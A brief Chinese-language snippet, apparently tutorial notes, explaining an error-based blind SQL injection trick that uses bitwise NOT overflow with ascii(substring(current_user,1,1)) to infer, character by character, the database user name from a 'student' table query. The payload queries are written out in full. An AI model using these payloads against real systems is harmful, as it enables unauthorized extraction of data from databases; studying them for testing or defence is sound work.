例如第一个字符是r 114,那么: select * from student s where id=1 and 1=~113+ascii(substring(current_user,1,1)) 而: select * from student s where id=1 and 1=~114+ascii(substring(current_user,1,1)) 不报错,并且之后>114的也不会报错,因此第一位就是114
r
select * from student s where id=1 and 1=~113+ascii(substring(current_user,1,1))
select * from student s where id=1 and 1=~114+ascii(substring(current_user,1,1))